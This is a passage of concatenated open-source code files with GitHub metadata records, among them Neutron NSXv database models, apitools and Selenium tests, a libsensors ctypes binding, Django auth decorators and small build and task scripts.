eventlet.spawn_n(session.post, action.geturl(), **kwargs)
|
{
"content_hash": "cb5108bafb23bf39e73e062efdb28129",
"timestamp": "",
"source": "github",
"line_count": 85,
"max_line_length": 78,
"avg_line_length": 38.67058823529412,
"alnum_prop": 0.5935503498630971,
"repo_name": "m1093782566/openstack_org_ceilometer",
"id": "e99022638ce336b8c1eb765076c197e1f28c368f",
"size": "3924",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "ceilometer/alarm/notifier/rest.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2657375"
},
{
"name": "Shell",
"bytes": "3204"
}
],
"symlink_target": ""
}
|
import sqlalchemy as sa
from sqlalchemy import orm
from neutron.db import l3_db
from neutron.db import model_base
from neutron.db import models_v2
from neutron.plugins.vmware.common import nsxv_constants
class NsxvRouterBinding(model_base.BASEV2, models_v2.HasStatusDescription):
"""Represents the mapping between neutron router and vShield Edge."""
__tablename__ = 'nsxv_router_bindings'
# no ForeignKey to routers.id because for now, a router can be removed
# from routers when delete_router is executed, but the binding is only
# removed after the Edge is deleted
router_id = sa.Column(sa.String(36),
primary_key=True)
edge_id = sa.Column(sa.String(36),
nullable=True)
lswitch_id = sa.Column(sa.String(36),
nullable=True)
appliance_size = sa.Column(sa.Enum(
nsxv_constants.COMPACT,
nsxv_constants.LARGE,
nsxv_constants.XLARGE,
nsxv_constants.QUADLARGE,
name='nsxv_router_bindings_appliance_size'))
edge_type = sa.Column(sa.Enum(nsxv_constants.SERVICE_EDGE,
nsxv_constants.VDR_EDGE,
name='nsxv_router_bindings_edge_type'))
class NsxvEdgeVnicBinding(model_base.BASEV2):
"""Represents mapping between vShield Edge vnic and neutron netowrk."""
__tablename__ = 'nsxv_edge_vnic_bindings'
edge_id = sa.Column(sa.String(36),
primary_key=True)
vnic_index = sa.Column(sa.Integer(),
primary_key=True)
tunnel_index = sa.Column(sa.Integer(),
primary_key=True)
network_id = sa.Column(sa.String(36), nullable=True)
class NsxvEdgeDhcpStaticBinding(model_base.BASEV2):
"""Represents mapping between mac addr and bindingId."""
__tablename__ = 'nsxv_edge_dhcp_static_bindings'
edge_id = sa.Column(sa.String(36), primary_key=True)
mac_address = sa.Column(sa.String(32), primary_key=True)
binding_id = sa.Column(sa.String(36), nullable=False)
class NsxvInternalNetworks(model_base.BASEV2):
"""Represents internal networks between NSXV plugin elements."""
__tablename__ = 'nsxv_internal_networks'
network_purpose = sa.Column(
sa.Enum(nsxv_constants.INTER_EDGE_PURPOSE,
name='nsxv_internal_networks_purpose'),
primary_key=True)
network_id = sa.Column(sa.String(36),
sa.ForeignKey("networks.id", ondelete="CASCADE"),
nullable=False)
class NsxvInternalEdges(model_base.BASEV2):
"""Represents internal Edge appliances for NSXV plugin operations."""
__tablename__ = 'nsxv_internal_edges'
ext_ip_address = sa.Column(sa.String(64), primary_key=True)
router_id = sa.Column(sa.String(36), nullable=False)
purpose = sa.Column(
sa.Enum(nsxv_constants.INTER_EDGE_PURPOSE,
name='nsxv_internal_edges_purpose'))
class NsxvSecurityGroupSectionMapping(model_base.BASEV2):
"""Backend mappings for Neutron Rule Sections.
This class maps a neutron security group identifier to the corresponding
NSX layer 3 section.
"""
__tablename__ = 'nsxv_security_group_section_mappings'
neutron_id = sa.Column(sa.String(36),
sa.ForeignKey('securitygroups.id',
ondelete="CASCADE"),
primary_key=True)
ip_section_id = sa.Column(sa.String(100))
class NsxvRuleMapping(model_base.BASEV2):
"""Backend mappings for Neutron Rule Sections.
This class maps a neutron security group identifier to the corresponding
NSX layer 3 and layer 2 sections.
"""
__tablename__ = 'nsxv_rule_mappings'
neutron_id = sa.Column(sa.String(36),
sa.ForeignKey('securitygrouprules.id',
ondelete="CASCADE"),
primary_key=True)
nsx_rule_id = sa.Column(sa.String(36), primary_key=True)
class NsxvPortVnicMapping(model_base.BASEV2):
"""Maps neutron port to NSXv VM Vnic Id."""
__tablename__ = 'nsxv_port_vnic_mappings'
neutron_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
nsx_id = sa.Column(sa.String(42), primary_key=True)
class NsxvRouterExtAttributes(model_base.BASEV2):
"""Router attributes managed by NSX plugin extensions."""
__tablename__ = 'nsxv_router_ext_attributes'
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id', ondelete="CASCADE"),
primary_key=True)
distributed = sa.Column(sa.Boolean, default=False, nullable=False)
exclusive = sa.Column(sa.Boolean, default=False, nullable=False)
service_router = sa.Column(sa.Boolean, default=False, nullable=False)
# Add a relationship to the Router model in order to instruct
# SQLAlchemy to eagerly load this association
router = orm.relationship(
l3_db.Router,
backref=orm.backref("nsx_attributes", lazy='joined',
uselist=False, cascade='delete'))
class NsxvTzNetworkBinding(model_base.BASEV2):
"""Represents a binding of a virtual network with a transport zone.
This model class associates a Neutron network with a transport zone;
optionally a vlan ID might be used if the binding type is 'bridge'
"""
__tablename__ = 'nsxv_tz_network_bindings'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
binding_type = sa.Column(
sa.Enum('flat', 'vlan', 'portgroup',
name='nsxv_tz_network_bindings_binding_type'),
nullable=False, primary_key=True)
phy_uuid = sa.Column(sa.String(36), primary_key=True, nullable=True)
vlan_id = sa.Column(sa.Integer, primary_key=True, nullable=True,
autoincrement=False)
def __init__(self, network_id, binding_type, phy_uuid, vlan_id):
self.network_id = network_id
self.binding_type = binding_type
self.phy_uuid = phy_uuid
self.vlan_id = vlan_id
def __repr__(self):
return "<NsxvTzNetworkBinding(%s,%s,%s,%s)>" % (self.network_id,
self.binding_type,
self.phy_uuid,
self.vlan_id)
class NsxvPortIndexMapping(model_base.BASEV2):
"""Associates attached Neutron ports with the instance VNic index."""
__tablename__ = 'nsxv_port_index_mappings'
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
device_id = sa.Column(sa.String(255), nullable=False)
index = sa.Column(sa.Integer, nullable=False)
__table_args__ = (sa.UniqueConstraint(device_id, index),)
# Add a relationship to the Port model in order to instruct SQLAlchemy to
# eagerly read port vnic-index
port = orm.relationship(
models_v2.Port,
backref=orm.backref("vnic_index", lazy='joined',
uselist=False, cascade='delete'))
class NsxvEdgeFirewallRuleBinding(model_base.BASEV2):
"""Mapping between firewall rule and edge firewall rule_id."""
__tablename__ = 'nsxv_firewall_rule_bindings'
rule_id = sa.Column(sa.String(36),
primary_key=True)
edge_id = sa.Column(sa.String(36), primary_key=True)
rule_vse_id = sa.Column(sa.String(36))
class NsxvSpoofGuardPolicyNetworkMapping(model_base.BASEV2):
"""Mapping between SpoofGuard and neutron networks"""
__tablename__ = 'nsxv_spoofguard_policy_network_mappings'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete='CASCADE'),
primary_key=True,
nullable=False)
policy_id = sa.Column(sa.String(36), nullable=False)
|
{
"content_hash": "145309f03d8f6aa84960f309ff8341ed",
"timestamp": "",
"source": "github",
"line_count": 219,
"max_line_length": 77,
"avg_line_length": 37.57077625570776,
"alnum_prop": 0.6109625668449198,
"repo_name": "blueboxgroup/neutron",
"id": "395238db0673b23509fa8f65f5782976cac98a37",
"size": "8859",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "neutron/plugins/vmware/dbexts/nsxv_models.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "21914"
},
{
"name": "JavaScript",
"bytes": "60527"
},
{
"name": "Makefile",
"bytes": "3295"
},
{
"name": "Python",
"bytes": "8670612"
},
{
"name": "Shell",
"bytes": "63149"
},
{
"name": "XSLT",
"bytes": "50907"
}
],
"symlink_target": ""
}
|
"""Test for gen_client module."""
import os
import unittest2
from apitools.gen import gen_client
from apitools.gen import test_utils
def GetDocPath(name):
return os.path.join(os.path.dirname(__file__), 'testdata', name)
@test_utils.RunOnlyOnPython27
class ClientGenCliTest(unittest2.TestCase):
def testHelp_NotEnoughArguments(self):
with self.assertRaisesRegexp(SystemExit, '0'):
with test_utils.CaptureOutput() as (_, err):
gen_client.main([gen_client.__file__, '-h'])
err_output = err.getvalue()
self.assertIn('usage:', err_output)
self.assertIn('error: too few arguments', err_output)
def testGenClient_SimpleDoc(self):
with test_utils.TempDir() as tmp_dir_path:
gen_client.main([
gen_client.__file__,
'--nogenerate_cli',
'--infile', GetDocPath('dns_v1.json'),
'--outdir', tmp_dir_path,
'--overwrite',
'--root_package', 'google.apis',
'client'
])
self.assertEquals(
set(['dns_v1_client.py', 'dns_v1_messages.py', '__init__.py']),
set(os.listdir(tmp_dir_path)))
def testGenClient_SimpleDocWithV4(self):
with test_utils.TempDir() as tmp_dir_path:
gen_client.main([
gen_client.__file__,
'--nogenerate_cli',
'--infile', GetDocPath('dns_v1.json'),
'--outdir', tmp_dir_path,
'--overwrite',
'--apitools_version', '0.4.12',
'--root_package', 'google.apis',
'client'
])
self.assertEquals(
set(['dns_v1_client.py', 'dns_v1_messages.py', '__init__.py']),
set(os.listdir(tmp_dir_path)))
def testGenClient_SimpleDocWithV5(self):
with test_utils.TempDir() as tmp_dir_path:
gen_client.main([
gen_client.__file__,
'--nogenerate_cli',
'--infile', GetDocPath('dns_v1.json'),
'--outdir', tmp_dir_path,
'--overwrite',
'--apitools_version', '0.5.0',
'--root_package', 'google.apis',
'client'
])
self.assertEquals(
set(['dns_v1_client.py', 'dns_v1_messages.py', '__init__.py']),
set(os.listdir(tmp_dir_path)))
def testGenPipPackage_SimpleDoc(self):
with test_utils.TempDir() as tmp_dir_path:
gen_client.main([
gen_client.__file__,
'--nogenerate_cli',
'--infile', GetDocPath('dns_v1.json'),
'--outdir', tmp_dir_path,
'--overwrite',
'--root_package', 'google.apis',
'pip_package'
])
self.assertEquals(
set(['apitools', 'setup.py']),
set(os.listdir(tmp_dir_path)))
def testGenProto_SimpleDoc(self):
with test_utils.TempDir() as tmp_dir_path:
gen_client.main([
gen_client.__file__,
'--nogenerate_cli',
'--infile', GetDocPath('dns_v1.json'),
'--outdir', tmp_dir_path,
'--overwrite',
'--root_package', 'google.apis',
'proto'
])
self.assertEquals(
set(['dns_v1_messages.proto', 'dns_v1_services.proto']),
set(os.listdir(tmp_dir_path)))
|
{
"content_hash": "7e0e3378d0fbb5902118a9dd101b0f7b",
"timestamp": "",
"source": "github",
"line_count": 101,
"max_line_length": 79,
"avg_line_length": 35.71287128712871,
"alnum_prop": 0.4835042971998891,
"repo_name": "catapult-project/catapult-csm",
"id": "25e9e23506eaa6443d64348739ea84241e7b429f",
"size": "4185",
"binary": false,
"copies": "13",
"ref": "refs/heads/master",
"path": "third_party/google-endpoints/apitools/gen/gen_client_test.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4902"
},
{
"name": "C++",
"bytes": "43728"
},
{
"name": "CSS",
"bytes": "24873"
},
{
"name": "Go",
"bytes": "80325"
},
{
"name": "HTML",
"bytes": "11817766"
},
{
"name": "JavaScript",
"bytes": "518002"
},
{
"name": "Makefile",
"bytes": "1588"
},
{
"name": "Python",
"bytes": "6207634"
},
{
"name": "Shell",
"bytes": "2558"
}
],
"symlink_target": ""
}
|
import click
def create_provider_command(group):
@group.command()
@click.argument("hosts", nargs=-1)
def hosts(hosts):
return hosts
|
{
"content_hash": "8f2274baf3394beb547e6c513b978255",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 38,
"avg_line_length": 19.25,
"alnum_prop": 0.6493506493506493,
"repo_name": "Trundle/harpoon",
"id": "6039be8ce9268a499ad52a696a5f5efedd51b3fa",
"size": "154",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "harpoon/hostlistproviders/hosts.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "13961"
}
],
"symlink_target": ""
}
|
import os
from ctypes import CDLL, c_char_p, c_int, c_void_p, c_uint, c_double, byref, Structure, get_errno,\
POINTER, c_short, c_size_t, create_string_buffer
from ctypes.util import find_library
from psistats.libsensors.lib import stdc
version_info = (0, 0, 3)
__version__ = '.'.join(map(str, version_info))
__date__ = '2014-08-17'
__author__ = "Marc 'BlackJack' Rintsch"
__contact__ = 'marc@rintsch.de'
__license__ = 'LGPL v2.1'
API_VERSION = 4
DEFAULT_CONFIG_FILENAME = '/etc/sensors3.conf'
LIB_FILENAME = os.environ.get('SENSORS_LIB') or find_library('sensors')
SENSORS_LIB = CDLL(LIB_FILENAME)
VERSION = c_char_p.in_dll(SENSORS_LIB, 'libsensors_version').value
MAJOR_VERSION = version_info[0]
class SensorsError(Exception):
def __init__(self, message, error_number=None):
Exception.__init__(self, message)
self.error_number = error_number
def _error_check(result, _func, _arguments):
if result < 0:
raise SensorsError(_strerror(result), result)
return result
_strerror = SENSORS_LIB.sensors_strerror
_strerror.argtypes = [c_int]
_strerror.restype = c_char_p
_init = SENSORS_LIB.sensors_init
_init.argtypes = [c_void_p]
_init.restype = c_int
_init.errcheck = _error_check
cleanup = SENSORS_LIB.sensors_cleanup
cleanup.argtypes = None
cleanup.restype = None
SENSORS_FEATURE_IN = 0x00
SENSORS_FEATURE_FAN = 0x01
SENSORS_FEATURE_TEMP = 0x02
SENSORS_FEATURE_POWER = 0x03
SENSORS_FEATURE_ENERGY = 0x04
SENSORS_FEATURE_CURR = 0x05
SENSORS_FEATURE_HUMIDITY = 0x06
# SENSORS_FEATURE_MAX_MAIN
SENSORS_FEATURE_VID = 0x10
SENSORS_FEATURE_INTRUSION = 0x11
#SENSORS_FEATURE_MAX_OTHER,
SENSORS_FEATURE_BEEP_ENABLE = 0x18
#SENSORS_FEATURE_MAX,
#SENSORS_FEATURE_UNKNOWN = INT_MAX
def init(config_filename=DEFAULT_CONFIG_FILENAME):
file_p = stdc.fopen(config_filename.encode('utf-8'), b'r')
if file_p is None:
error_number = get_errno()
raise OSError(error_number, os.strerror(error_number), config_filename)
try:
_init(file_p)
finally:
stdc.fclose(file_p)
class Subfeature(Structure):
_fields_ = [
('name', c_char_p),
('number', c_int),
('type', c_int),
('mapping', c_int),
('flags', c_uint),
]
def __repr__(self):
return '<%s name=%r number=%d type=%d mapping=%d flags=%08x>' % (
self.__class__.__name__,
self.name,
self.number,
self.type,
self.mapping,
self.flags
)
def get_value(self):
result = c_double()
_get_value(byref(self.parent.chip), self.number, byref(result))
return result.value
SUBFEATURE_P = POINTER(Subfeature)
class Feature(Structure):
_fields_ = [
('name', c_char_p),
('number', c_int),
('type', c_int),
('_first_subfeature', c_int),
('_padding1', c_int),
]
def __repr__(self):
return '<%s name=%r number=%r type=%r>' % (
self.__class__.__name__,
self.name,
self.number,
self.type
)
def __iter__(self):
number = c_int(0)
while True:
result_p = _get_all_subfeatures(
byref(self.chip),
byref(self),
byref(number)
)
if not result_p:
break
result = result_p.contents
result.chip = self.chip
result.parent = self
yield result
@property
def label(self):
#
# TODO Maybe this is a memory leak!
#
return _get_label(byref(self.chip), byref(self)).decode('utf-8')
def get_value(self):
#
# TODO Is the first always the correct one for all feature types?
#
return next(iter(self)).get_value()
FEATURE_P = POINTER(Feature)
class Bus(Structure):
TYPE_ANY = -1
NR_ANY = -1
_fields_ = [
('type', c_short),
('nr', c_short),
]
def __str__(self):
return (
'*' if self.type == self.TYPE_ANY
else _get_adapter_name(byref(self)).decode('utf-8')
)
def __repr__(self):
return '%s(%r, %r)' % (self.__class__.__name__, self.type, self.nr)
@property
def has_wildcards(self):
return self.type == self.TYPE_ANY or self.nr == self.NR_ANY
BUS_P = POINTER(Bus)
class Chip(Structure):
#
# TODO Move common stuff into `AbstractChip` class.
#
_fields_ = [
('prefix', c_char_p),
('bus', Bus),
('addr', c_int),
('path', c_char_p),
]
PREFIX_ANY = None
ADDR_ANY = -1
def __new__(cls, *args):
result = super(Chip, cls).__new__(cls)
if args:
_parse_chip_name(args[0].encode('utf-8'), byref(result))
return result
def __init__(self, *_args):
Structure.__init__(self)
#
# Need to bind the following to the instance so it is available in
# `__del__()` when the interpreter shuts down.
#
self._free_chip_name = _free_chip_name
self.byref = byref
def __del__(self):
if self._b_needsfree_:
self._free_chip_name(self.byref(self))
def __repr__(self):
return '<%s prefix=%r bus=%r addr=%r path=%r>' % (
(
self.__class__.__name__,
self.prefix,
self.bus,
self.addr,
self.path
)
)
def __str__(self):
buffer_size = 200
result = create_string_buffer(buffer_size)
used = _snprintf_chip_name(result, len(result), byref(self))
assert used < buffer_size
return result.value.decode('utf-8')
def __iter__(self):
number = c_int(0)
while True:
result_p = _get_features(byref(self), byref(number))
if not result_p:
break
result = result_p.contents
result.chip = self
yield result
@property
def adapter_name(self):
return str(self.bus)
@property
def has_wildcards(self):
return (
self.prefix == self.PREFIX_ANY
or self.addr == self.ADDR_ANY
or self.bus.has_wildcards
)
CHIP_P = POINTER(Chip)
_parse_chip_name = SENSORS_LIB.sensors_parse_chip_name
_parse_chip_name.argtypes = [c_char_p, CHIP_P]
_parse_chip_name.restype = c_int
_parse_chip_name.errcheck = _error_check
_free_chip_name = SENSORS_LIB.sensors_free_chip_name
_free_chip_name.argtypes = [CHIP_P]
_free_chip_name.restype = None
_snprintf_chip_name = SENSORS_LIB.sensors_snprintf_chip_name
_snprintf_chip_name.argtypes = [c_char_p, c_size_t, CHIP_P]
_snprintf_chip_name.restype = c_int
_snprintf_chip_name.errcheck = _error_check
_get_adapter_name = SENSORS_LIB.sensors_get_adapter_name
_get_adapter_name.argtypes = [BUS_P]
_get_adapter_name.restype = c_char_p
_get_label = SENSORS_LIB.sensors_get_label
_get_label.argtypes = [CHIP_P, FEATURE_P]
_get_label.restype = c_char_p
_get_value = SENSORS_LIB.sensors_get_value
_get_value.argtypes = [CHIP_P, c_int, POINTER(c_double)]
_get_value.restype = c_int
_get_value.errcheck = _error_check
#
# TODO sensors_set_value()
# TODO sensors_do_chip_sets()
#
_get_detected_chips = SENSORS_LIB.sensors_get_detected_chips
_get_detected_chips.argtypes = [CHIP_P, POINTER(c_int)]
_get_detected_chips.restype = CHIP_P
_get_features = SENSORS_LIB.sensors_get_features
_get_features.argtypes = [CHIP_P, POINTER(c_int)]
_get_features.restype = FEATURE_P
_get_all_subfeatures = SENSORS_LIB.sensors_get_all_subfeatures
_get_all_subfeatures.argtypes = [CHIP_P, FEATURE_P, POINTER(c_int)]
_get_all_subfeatures.restype = SUBFEATURE_P
#
# TODO sensors_get_subfeature() ?
#
def iter_detected_chips(chip_name='*-*'):
chip = Chip(chip_name)
number = c_int(0)
while True:
result = _get_detected_chips(byref(chip), byref(number))
if not result:
break
yield result.contents
|
{
"content_hash": "7271073b3abd0a750e46e77adcd3f759",
"timestamp": "",
"source": "github",
"line_count": 310,
"max_line_length": 99,
"avg_line_length": 26.296774193548387,
"alnum_prop": 0.5789990186457311,
"repo_name": "psistats/linux-client",
"id": "90c27b2903fa4997be8f9483adfff7bc898816a7",
"size": "8525",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "psistats/libsensors/lib/sensors.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "178"
},
{
"name": "Python",
"bytes": "70611"
},
{
"name": "Shell",
"bytes": "1529"
}
],
"symlink_target": ""
}
|
import sys
import os
test_root = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), ".."))
slideatlas_root = os.path.abspath(os.path.join(test_root, ".."))
sys.path.append(test_root)
sys.path.append(slideatlas_root)
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import NoSuchElementException
import unittest, time, re
from comparetools import sameimage
from time import sleep
BASE_URL = "http://new.slide-atlas.org"
class DemoTests(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Chrome()
self.mouse = webdriver.ActionChains(self.driver)
# self.driver = webdriver.Firefox()
self.driver.set_window_size(1000, 1000)
# self.driver.maximize_window()
# self.driver.implicitly_wait(1)
self.base_url = BASE_URL
self.verificationErrors = []
def open_melanoma(self):
driver = self.driver
driver.get(BASE_URL + "/logout")
# self.driver.maximize_window()
self.driver.execute_script("window.resizeTo(1100,1100);")
sleep(2)
driver.find_element_by_link_text("Home").click()
self.driver.implicitly_wait(1)
driver.find_element_by_link_text("Login").click()
self.driver.implicitly_wait(1)
driver.find_element_by_id("email").clear()
self.driver.implicitly_wait(1)
driver.find_element_by_id("email").send_keys("all_demo")
self.driver.implicitly_wait(1)
driver.find_element_by_id("submit").click()
self.driver.implicitly_wait(1)
driver.find_element_by_link_text("Sessions").click()
self.driver.implicitly_wait(1)
driver.find_element_by_link_text("Skin").click()
self.driver.implicitly_wait(1)
driver.find_element_by_link_text("4815 - 2010-10-06 16.32.21.ndpi").click()
sleep(3)
def test_navigation(self):
"""
Following snippet is useful in deciding the test_navigation
document.onmousemove = function(e){
var x = e.pageX;
var y = e.pageY;
e.target.title = "X is "+x+" and Y is "+y;
};
"""
driver = self.driver
self.open_melanoma()
canvas = self.driver.find_element_by_tag_name("canvas")
# Define zoomin and zoomout
pan = webdriver.ActionChains(driver)
pan.move_to_element_with_offset(canvas, 500,500)
pan.click_and_hold()
pan.move_to_element_with_offset(canvas, 600,500)
pan.release()
zoomin = webdriver.ActionChains(driver)
zoomin.click()
zoomin.click()
zoomout = webdriver.ActionChains(driver)
zoomout.context_click()
zoomout.context_click()
zoomout.perform()
sleep(1)
zoomout.perform()
sleep(1)
pan.perform()
sleep(1)
zoomin.perform()
sleep(1)
zoomin.perform()
sleep(1)
zoomin.perform()
sleep(1)
averagefunc = "return (function () { var total = 0; for(var i = 0; i < TILESTATS.tiles.length; i ++) { total = total + TILESTATS.tiles[i].loadtime; } return total / TILESTATS.tiles.length;})();"
stats = driver.execute_script(averagefunc)
print "Average tile load time: ", stats
def test_glviewer_in_demo(self):
driver = self.driver
self.open_melanoma()
sleep(2)
driver.save_screenshot('demo_glview.png')
# print "<DartMeasurementFile name=\"glview_demo\" type=\"image/png\"> demo_glview.png </DartMeasurementFile>"
self.failUnless(sameimage("demo_glview.png", os.path.join(test_root,"imgs/demo_glview.png")), "Images not same, look at the difference score")
def is_element_present(self, how, what):
try: self.driver.find_element(by=how, value=what)
except NoSuchElementException, e: return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert.text
finally: self.accept_next_alert = True
def tearDown(self):
self.driver.quit()
self.assertEqual([], self.verificationErrors)
if __name__ == "__main__":
unittest.main()
|
{
"content_hash": "370750eb6cc821b6c188c37f586c1fcc",
"timestamp": "",
"source": "github",
"line_count": 135,
"max_line_length": 202,
"avg_line_length": 33.074074074074076,
"alnum_prop": 0.6161254199328108,
"repo_name": "SlideAtlas/SlideAtlas-Server",
"id": "9e9fa61274cb26e6a4371228c7915c8db65de6a9",
"size": "4465",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "testing/regression/test_on_demodb.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CMake",
"bytes": "3869"
},
{
"name": "CSS",
"bytes": "80540"
},
{
"name": "HTML",
"bytes": "191521"
},
{
"name": "JavaScript",
"bytes": "2008727"
},
{
"name": "Jupyter Notebook",
"bytes": "4818"
},
{
"name": "Python",
"bytes": "548349"
},
{
"name": "Shell",
"bytes": "6978"
}
],
"symlink_target": ""
}
|
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.http import HttpResponseRedirect
from urllib import quote
def user_passes_test(test_func, login_url=None):
"""
Decorator for views that checks that the user passes the given test,
redirecting to the log-in page if necessary. The test should be a callable
that takes the user object and returns True if the user passes.
"""
if not login_url:
from django.conf import settings
login_url = settings.LOGIN_URL
def _dec(view_func):
def _checklogin(request, *args, **kwargs):
if test_func(request.user):
return view_func(request, *args, **kwargs)
return HttpResponseRedirect('%s?%s=%s' % (login_url, REDIRECT_FIELD_NAME, quote(request.get_full_path())))
_checklogin.__doc__ = view_func.__doc__
_checklogin.__dict__ = view_func.__dict__
return _checklogin
return _dec
login_required = user_passes_test(lambda u: u.is_authenticated())
login_required.__doc__ = (
"""
Decorator for views that checks that the user is logged in, redirecting
to the log-in page if necessary.
"""
)
def permission_required(perm, login_url=None):
"""
Decorator for views that checks whether a user has a particular permission
enabled, redirecting to the log-in page if necessary.
"""
return user_passes_test(lambda u: u.has_perm(perm), login_url=login_url)
|
{
"content_hash": "f13819032e5adb5d633eddb719cf3de1",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 118,
"avg_line_length": 37.282051282051285,
"alnum_prop": 0.6671251719394773,
"repo_name": "jonaustin/advisoryscan",
"id": "2fb4a6f510d645dbf94b948f1c0df123c08e0f8e",
"size": "1454",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django/django/contrib/auth/decorators.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "63725"
},
{
"name": "JavaScript",
"bytes": "159708"
},
{
"name": "Perl",
"bytes": "89271"
},
{
"name": "Python",
"bytes": "2194026"
},
{
"name": "Shell",
"bytes": "3612"
}
],
"symlink_target": ""
}
|
import asyncio
import importlib
import sys
class ServerLoop:
def __init__(self, loop, inputs, filters, outputs):
self.loop = loop
self.inputs = inputs
self.filters = filters
self.outputs = outputs
self.records_available = asyncio.Event(loop=loop)
# TODO: reload support using imp.reload()
self.input_mods = []
self.filter_mods = []
self.output_mods = []
for name, opts in self.inputs.items():
print('loading input module {}...'.format(name))
mod = importlib.import_module('..inputs.{}'.format(name), __name__)
mod.init(self.loop, opts, self.records_available)
self.input_mods.append(mod)
for name, opts in self.filters.items():
print('loading filter module {}...'.format(name))
mod = importlib.import_module('..filters.{}'.format(name), __name__)
mod.init(self.loop, opts)
self.filter_mods.append(mod)
for name, opts in self.outputs.items():
print('loading output module {}...'.format(name))
mod = importlib.import_module('..outputs.{}'.format(name), __name__)
mod.init(self.loop, opts)
self.output_mods.append(mod)
async def serve(self):
print('started.')
while True:
# Wait until if any input module notifies me.
# Via this notification scheme, we can avoid busy-waiting.
await self.records_available.wait()
self.records_available.clear()
records = []
for mod in self.input_mods:
records.extend(mod.fetch())
if records:
# TODO: apply filters
for mod in self.output_mods:
mod.enqueue(records)
|
{
"content_hash": "9479a1f19ae00595b136c5e65f8fad99",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 80,
"avg_line_length": 36.34,
"alnum_prop": 0.5586130985140341,
"repo_name": "lablup/logger",
"id": "a3435bf13df14221270685482896543cc0b67de3",
"size": "1842",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "logger/server.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "8771"
},
{
"name": "Shell",
"bytes": "705"
}
],
"symlink_target": ""
}
|
"""
Copies the modules into the resources folder
"""
from os.path import join, relpath
import shutil
import sys
import rjsmin
from modular_build import read_file, write_file
def main(argv):
try:
input_path_flag_index = argv.index('--input_path')
input_path = argv[input_path_flag_index + 1]
output_path_flag_index = argv.index('--output_path')
output_path = argv[output_path_flag_index + 1]
devtools_modules = argv[1:input_path_flag_index]
except:
print('Usage: %s module_1 module_2 ... module_N --input_path <input_path> --output_path <output_path>' % argv[0])
raise
for file_name in devtools_modules:
file_content = read_file(join(input_path, file_name))
minified = rjsmin.jsmin(file_content)
write_file(join(output_path, relpath(file_name, 'front_end')), minified)
def DoMain(argv):
if '--gen_rsp' in argv:
# Write all following args to the specified rsp file.
rsp_index = argv.index('--gen_rsp')
rsp_path = argv[rsp_index + 1]
with open(rsp_path, 'w') as rsp_file:
rsp_file.writelines("%s\n" % a for a in argv[rsp_index + 2:])
return rsp_path # Return the rsp path for GYP's <(pymod_do_main ...)
elif '--rsp' in argv:
# Replace the --rsp arg with the contents of the rsp file.
rsp_index = argv.index('--rsp')
rsp_path = argv[rsp_index + 1]
with open(rsp_path, 'r') as rsp_file:
rsp_args = [line.strip() for line in rsp_file]
return main(argv[:rsp_index] + rsp_args + argv[rsp_index + 2:])
else:
return main(argv)
if __name__ == '__main__':
sys.exit(DoMain(sys.argv))
|
{
"content_hash": "0bfd537d070bac56479a48f01f89dd41",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 121,
"avg_line_length": 34.02,
"alnum_prop": 0.6072898295120517,
"repo_name": "youtube/cobalt_sandbox",
"id": "5517596786d28034b49fdc3fdd259f9abf41b71d",
"size": "1911",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "third_party/devtools/scripts/build/copy_devtools_modules.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
import tasks
wait_min = 60
import rq
if __name__ == "__main__":
tasks.q_update.enqueue(tasks.update_all,wait_min)
tasks.q_new.enqueue(tasks.get_new_url)
tasks.q_retry.enqueue(tasks.retry)
#tasks.update_worker.work()
#tasks.new_worker.work()
print "Start....."
|
{
"content_hash": "5a6386d39be82a21501cf89bfc585f14",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 53,
"avg_line_length": 24,
"alnum_prop": 0.6423611111111112,
"repo_name": "seraphlnWu/in_trip",
"id": "ba6d5f015a3da8d446b9a7747bd5d2efd87763a7",
"size": "288",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "in_trip/in_trip/youku/service.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "20830"
},
{
"name": "Java",
"bytes": "4625"
},
{
"name": "JavaScript",
"bytes": "76507"
},
{
"name": "Python",
"bytes": "349718"
},
{
"name": "Scheme",
"bytes": "6001"
},
{
"name": "Shell",
"bytes": "7188"
}
],
"symlink_target": ""
}
|
"""Functions for inference."""
import os
import argparse
import functools
import paddle
